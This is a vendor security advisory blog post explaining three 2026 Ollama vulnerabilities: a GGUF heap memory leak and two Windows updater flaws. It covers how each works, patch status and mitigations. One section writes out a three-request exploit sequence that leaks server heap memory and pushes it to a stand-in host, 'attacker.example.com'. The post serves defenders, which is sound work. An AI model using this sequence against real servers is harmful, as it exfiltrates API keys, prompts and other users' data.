Mondoo

Three Ollama CVEs in One Week: Bleeding Llama Plus Two Windows Updater Flaws Awaiting Release

Three distinct Ollama vulnerabilities surfaced in early May 2026 and most coverage runs them together. CVE-2026-7482 (Bleeding Llama) is a critical unauthenticated heap memory leak in the GGUF loader, fixed in 0.17.1. CVE-2026-42248 and CVE-2026-42249 are two Windows-only auto-updater bugs that chain into persistent code execution. Their fix merged on Ollama's main branch on May 11, 2026, but has not yet shipped in a tagged release. Mondoo Vulnerability Intelligence tracks all three.

Christoph Hartmann · 8 min read

Three new Ollama vulnerabilities landed within days of each other in early May 2026. Most of the press coverage bundles them together, which makes them easy to confuse. They are not the same bug, they affect different platforms, and they require different responses. This post pulls them apart.

What is Ollama?

Ollama is a popular open source runtime for running large language models on your own hardware. You install it on a Mac, a Linux server, or a Windows laptop, pull down a model like Llama 3 or Mistral, and run inference locally instead of calling a hosted API. It is widely used as a backend for tools like Claude Code, Cursor, Continue, and various AI agents.

Ollama exposes a small HTTP API on TCP port 11434. By default that listener is bound to 127.0.0.1, so only software on the same machine can reach it. Many production deployments override this with OLLAMA_HOST=0.0.0.0:11434 so that other servers, IDE plugins, or coworkers can share a single GPU host. That HTTP API is what Bleeding Llama (CVE-2026-7482) attacks. The two Windows updater bugs attack a completely different channel, which is the most important thing to understand before reading on.

The three CVEs at a glance

| CVE | Name | Reporter | Severity | Affected platforms | Patch status |
| --- | --- | --- | --- | --- | --- |
| CVE-2026-7482 | Bleeding Llama | Cyera Research | Critical, CVSS 9.1 | All platforms < 0.17.1 | Fixed in Ollama 0.17.1 |
| CVE-2026-42248 | Updater signature bypass | Striga, via CERT.PL | High, CVSS 7.7 | Windows 0.12.10 through 0.23.2 | Fix merged on main (PR #16100, May 11, 2026); no tagged release yet |
| CVE-2026-42249 | Updater path traversal | Striga, via CERT.PL | High, CVSS 7.7 | Windows 0.12.10 through 0.23.2 | Fix merged on main (PR #16100, May 11, 2026); no tagged release yet |

The two Windows bugs chain together. The signature bypass lets an attacker substitute the update payload and the path traversal lets that payload land somewhere persistent like the Startup folder. Together they produce silent code execution at the privilege level of the user running Ollama.

Inbound vs outbound: two different attack surfaces

Ollama is involved in two completely separate kinds of network traffic, and each of the new CVEs lives on one side of that line. This is the single most important distinction in this post.

  • Inbound (the inference API). Tools and clients open connections to Ollama on port 11434 to send prompts. Bleeding Llama (CVE-2026-7482) is an attack on this channel. Binding to 127.0.0.1, putting an authenticating proxy in front of port 11434, or firewalling the port off all mitigate it, because each one makes the API unreachable to the attacker.
  • Outbound (the auto-updater). Ollama for Windows reaches out to a vendor update endpoint to download new versions of itself on a schedule. CVE-2026-42248 and CVE-2026-42249 are attacks on this channel. An attacker who can sit on the network path between the laptop and the update endpoint (hostile Wi-Fi, DNS poisoning, a compromised proxy, a captive portal) serves a malicious response. The exploit code runs inside Ollama on the victim's machine.

Localhost binding does not cover the updater bugs. It is the right move for Bleeding Llama, but it does nothing for CVE-2026-42248 and CVE-2026-42249, because those are outbound attacks. The vulnerable code runs inside Ollama on your machine regardless of whether the inference port is exposed.

Why these matter

  • AI runtimes hold sensitive data. A single Ollama instance typically processes source code from coding assistants, system prompts, RAG context, and provider API keys exported as environment variables. Bleeding Llama hands that to an unauthenticated remote attacker.
  • The exposed footprint is large. Internet scans cited in the original disclosure put the number of Ollama servers reachable on 0.0.0.0:11434 without authentication at roughly 300,000.
  • Detection takes more than a CVE feed. Bleeding Llama was fixed in 0.17.1 on February 24, 2026, but a CVE was not assigned until April 28, leaving about two months in which NVD-driven scanners had nothing to alert on. The Windows updater fix landed on main on May 11 but has not yet shipped in a tagged release, so a release-notes-only check still does not catch it.
  • Patching Bleeding Llama does not close the updater bugs. The Windows updater code path is present in every release from 0.12.10 through the current latest tagged release, v0.23.2, including the 0.17.1 build that fixes Bleeding Llama.

CVE-2026-7482, "Bleeding Llama", is the memory leak

Discovered by Dor Attias of Cyera Research, this is the bug that Ollama has already fixed. It is a heap out-of-bounds read in the GGUF model loader. An unauthenticated attacker who can reach the Ollama HTTP API can leak the entire process memory of the server, including environment variables, API keys, system prompts, and other users' conversations.

How it works

Ollama uses the GGUF format for model files. Each tensor in a GGUF file declares its shape, data type, and offset, and Ollama trusts these declarations. The /api/create endpoint accepts a GGUF blob and walks each tensor for quantization. The conversion goes through WriteTo in server/quantization.go, which calls ggml.ConvertToF32 in fs/ggml/gguf.go. ConvertToF32 allocates a destination F32 buffer sized from the declared shape and then reads exactly tensor.Elements() values from the source pointer. There is no check that tensor.Elements() matches the size of the tensor's actual data in the file.

An attacker can declare a tiny F16 tensor on disk but set its shape to a million elements. The loop reads megabytes past the end of the mapped buffer into adjacent heap memory, and writes the result into the destination F32 buffer. Because F16 to F32 is a lossless widening, every byte of leaked heap survives the conversion intact and ends up in a new model file on disk.

The three-call exploit

```http
POST /api/blobs/sha256:<digest>
<crafted GGUF: F16 tensor with shape 1,000,000 but only a few bytes of real data>

POST /api/create
{"model": "attacker.example.com/leaks/run1:latest",
 "files": [{"path": "sha256:<digest>"}],
 "quantize": "f32"}

POST /api/push
{"model": "attacker.example.com/leaks/run1:latest"}
```

Step 2 triggers the out-of-bounds read and writes a new model file containing the leaked heap bytes. Step 3 uploads that file to the host named in the model identifier. Repeat to scrape more memory.

Why F16 to F32 matters

Most quantization paths in Ollama are lossy. A lossy quantizer would round or truncate the leaked bytes before writing them out. The F16 to F32 path is the only commonly available conversion that is mathematically lossless, so it preserves every input byte and turns the leak into a clean exfiltration channel.

Status: fixed in 0.17.1

Ollama v0.17.1 shipped on February 24, 2026. The release notes describe feature work (Nemotron support, MLX memory improvements, web search for tool-using models) without a security note, so anyone who skipped the release because nothing in the changelog called for an urgent upgrade is still vulnerable. The Echo CNA assigned CVE-2026-7482 on April 28 and Cyera published the technical writeup on May 2.

CVE-2026-42248 and CVE-2026-42249 are the Windows updater bugs

These two are completely separate from Bleeding Llama. They were reported by Striga and disclosed through CERT Polska after weeks of vendor silence. They affect only the Windows build of Ollama.

CVE-2026-42248: missing signature verification

Ollama for Windows downloads update executables and runs them without verifying signatures. The macOS build does perform this verification. Anyone who can sit between the Ollama installation and the update endpoint (malicious DNS resolver, hostile Wi-Fi, compromised proxy) can substitute an arbitrary executable. CWE-494 (Download of Code Without Integrity Check).

CVE-2026-42249: path traversal in the staging directory

The updater builds the staging directory path from values in the HTTP response headers without sanitizing them. An attacker controlling the update server can include path traversal sequences in those headers. Because the unsanitized value flows into filepath.Join, the staged file lands wherever the attacker chooses. The natural target is the per-user Windows Startup folder. CWE-22 (Path Traversal).

Chained, they produce persistent code execution

Either bug alone is awkward to exploit. Combined, they drop a planted executable into the Startup folder, where it runs at the user's privilege level on every login. Because Ollama for Windows updates itself automatically, without user interaction, there is no prompt the victim could refuse. All the attacker needs is a position on the network path to the update endpoint, which is well within reach on shared corporate Wi-Fi, hotel networks, conference networks, captive portals, and any environment with controllable DNS.

Status: fix merged on main, not yet in a tagged release

CERT.PL published the advisory on April 29, 2026, after Striga reported the bugs in late January and the standard coordinated process did not progress. The advisory officially lists Ollama for Windows 0.12.10 through 0.17.5 as vulnerable, and Striga's follow-up verification, reported by Help Net Security, found the same vulnerable functions unchanged through v0.22.0.

On May 11, 2026, Ollama maintainer dhiltgen merged PR #16100, "app: harden update flows" on main. The diff implements both halves of the fix in app/updater/updater.go and app/updater/updater_windows.go:

  • CVE-2026-42248: verifyDownload() on Windows is no longer a no-op. It now calls WinVerifyTrustEx with the standard Authenticode action, then walks the signer certificate chain via CryptQueryObject and verifies that the signing organization is exactly "Ollama Inc.". A validly signed installer from any other publisher is rejected.
  • CVE-2026-42249: Three new helpers (safeUpdateFilename, ensurePathInDir, updateStageETagDir) reject filenames that contain path separators, ., .., or absolute paths, hash the etag with SHA-256 instead of using it raw, and verify the resulting staged path does not escape the staging directory.

The fix is on main but has not yet shipped in a tagged release. The latest tagged release as of this writing is v0.23.2 from May 7, 2026, which predates the fix. Every Windows build from 0.12.10 through v0.23.2 should be treated as vulnerable. Watch for the next tagged Ollama for Windows release that contains commit 3d5a011a and apply it as soon as it lands.

What to do

The three CVEs need three different responses. Treat them independently.

For CVE-2026-7482 (Bleeding Llama)

  1. Upgrade every Ollama install to 0.17.1 or newer. Pull the latest release from the Ollama GitHub releases page or update via your package manager. Rebuild container images and roll deployments.
  2. Do not bind Ollama to 0.0.0.0 without an authenticating proxy in front. The default 127.0.0.1 is correct. If you need remote access, front the API with Caddy, Nginx with mTLS or basic auth, an API gateway, or a service mesh sidecar.
  3. Rotate secrets that may have been in scope. Assume any pre-0.17.1 Ollama instance reachable from an untrusted network may have leaked the contents of its environment, including provider API keys, vector database credentials, and tool-use tokens.
  4. Inventory exposed instances. Scans should look for TCP/11434 listeners. On Linux, ss -tlnp | grep 11434 is the quick check; on macOS, lsof -nP -iTCP:11434 -sTCP:LISTEN.

For CVE-2026-42248 and CVE-2026-42249 (Windows updater chain)

The fix has merged on main but has not yet shipped in a tagged release, so until that release lands, the goal is to take the vulnerable update path out of reach. Ollama added a built-in toggle for this in v0.17.1 (PR #13512, merged February 23, 2026), so the cleanest mitigation is also the simplest one: turn the auto-downloader off.

  1. Disable auto-downloads in the Ollama app settings (v0.17.1 and later). Open the Ollama tray app, go to Settings, and turn off the Auto-download updates toggle. Per the PR description, when disabled the background updater still checks for updates but skips downloading, and any in-flight download is cancelled immediately. Skipping the download skips the vulnerable code paths in both CVEs. This is the recommended setting for every Windows install until Ollama publishes a security fix that explicitly references CVE-2026-42248 and CVE-2026-42249.

  2. Block the Ollama tray app from reaching the network (fleet-wide enforcement, or pre-0.17.1 hosts). The auto-updater runs out of ollama app.exe (the system tray application), not the ollama.exe CLI. A Defender Firewall rule blocks the update path without disabling local inference. From an elevated PowerShell on each host, or via Group Policy / MDM for fleets:

    ```powershell
    New-NetFirewallRule -DisplayName "Block Ollama tray auto-updater" `
        -Direction Outbound `
        -Program "$env:LOCALAPPDATA\Programs\Ollama\ollama app.exe" `
        -Action Block
    ```

    This matches the community-tested workaround and leaves ollama pull, model inference, and other CLI commands working. Use this when you cannot rely on a per-user UI setting, for example on managed laptops where users could re-enable the toggle.

  3. Treat untrusted networks as exposure. Until a fix ships, Ollama for Windows installs that connect through hotel Wi-Fi, conference networks, captive portals, or untrusted DNS should be considered at risk every time they reach the update endpoint, regardless of whether the toggle is currently off.

  4. Watch the Startup folders. Per-user (%AppData%\Microsoft\Windows\Start Menu\Programs\Startup) and machine-wide (%ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp) are the obvious landing zones for the chained exploit. Add them to your EDR's high-priority watch list if they are not already there.

  5. Apply the next tagged release that contains PR #16100. Disabling auto-downloads is a mitigation, not a fix. The actual fix for both CVEs (commit 3d5a011a) merged on May 11, 2026 but has not yet shipped in a tagged release. Watch Ollama's GitHub releases for the first version after v0.23.2 that includes that commit, then apply it on a controlled rollout before re-enabling auto-downloads or removing the network block.

Prioritize by environment

  • Critical: Any Ollama instance reachable from an untrusted network on port 11434, multi-tenant Ollama hosts, GPU servers running pre-0.17.1 builds, and Windows developer laptops that travel onto untrusted networks.
  • High: Single-tenant Ollama servers behind a firewall; Windows workstations on trusted corporate networks with controlled DNS and update routing.
  • Moderate: macOS and Linux laptops only running Ollama locally on 127.0.0.1. Not exposed to Bleeding Llama and not in scope for the Windows updater bugs. Patch on the next regular cycle.

Detect with Mondoo

Tracking three CVEs across Linux servers, GPU hosts, macOS workstations, Windows laptops, and container images is the kind of fan-out that is easy to get wrong by hand. Mondoo handles it.

  • All three CVEs are tracked in Mondoo Vulnerability Intelligence. CVE-2026-7482, CVE-2026-42248, and CVE-2026-42249 all have entries with version ranges, severity, and remediation guidance.
  • Mondoo continuously inventories Ollama installations across workstations, GPU servers, and container images. Any Linux or macOS host running below 0.17.1 is flagged for Bleeding Llama. Any Windows host running 0.12.10 or later is flagged for both updater CVEs until the first tagged release containing PR #16100 is published, at which point the version range will tighten automatically.
  • Mondoo policies verify configuration, not just versions. Linux services should not be bound to 0.0.0.0 without an authenticating proxy. The systemd unit or container should not export sensitive environment variables into the inference process. Windows installations should have the tray updater's auto-download toggle disabled, or be blocked at the network layer. Mondoo can check all of this on every scan.

Disclosure timeline

| Date | Event |
| --- | --- |
| Jan 27, 2026 | Striga reports the Windows updater bugs to Ollama |
| Feb 2, 2026 | Cyera reports Bleeding Llama to Ollama |
| Feb 24, 2026 | Ollama ships v0.17.1 with the Bleeding Llama fix |
| Apr 28, 2026 | Echo CNA assigns CVE-2026-7482 |
| Apr 29, 2026 | CERT.PL publishes the Windows updater advisory; CVE-2026-42248 and CVE-2026-42249 become public |
| May 1, 2026 | CVE-2026-7482 published |
| May 2, 2026 | Cyera publishes the technical writeup |
| May 11, 2026 | Ollama merges PR #16100 on main, fixing both Windows updater CVEs (Authenticode + signer-org check, plus filename and staging-path sanitization) |
| May 12, 2026 | No tagged Ollama release yet contains the fix; v0.23.2 (May 7) remains the latest |

Takeaway

Two bugs reported in the same week, two very different disclosure paths. Bleeding Llama was fixed within weeks of the initial report and only later picked up a CVE, so for two months it lived in the changelog as a feature release. The Windows updater chain went public on April 29 with no fix in tree; the fix landed on main on May 11 but has yet to ship in a tagged release as of this writing. Either way, a remediation workflow that depends on CVE feeds catching everything at the right moment, or on release notes calling out the right commit, will miss bugs in this shape. Inventory what is actually installed, verify configuration, and watch the relevant upstream pages directly. We have written about this pattern in The Disclosure Vacuum Is a Remediation Vacuum in Disguise.


About the Author

Christoph Hartmann

Co-Founder & CTO

Christoph Hartmann, co-founder and CTO at Mondoo, wants to make the world more secure. He's long been a leader in security engineering and DevOps, creating widely adopted solutions like Dev-Sec.io and Chef InSpec. For fun, he builds everything from custom operating systems to autonomous robots.
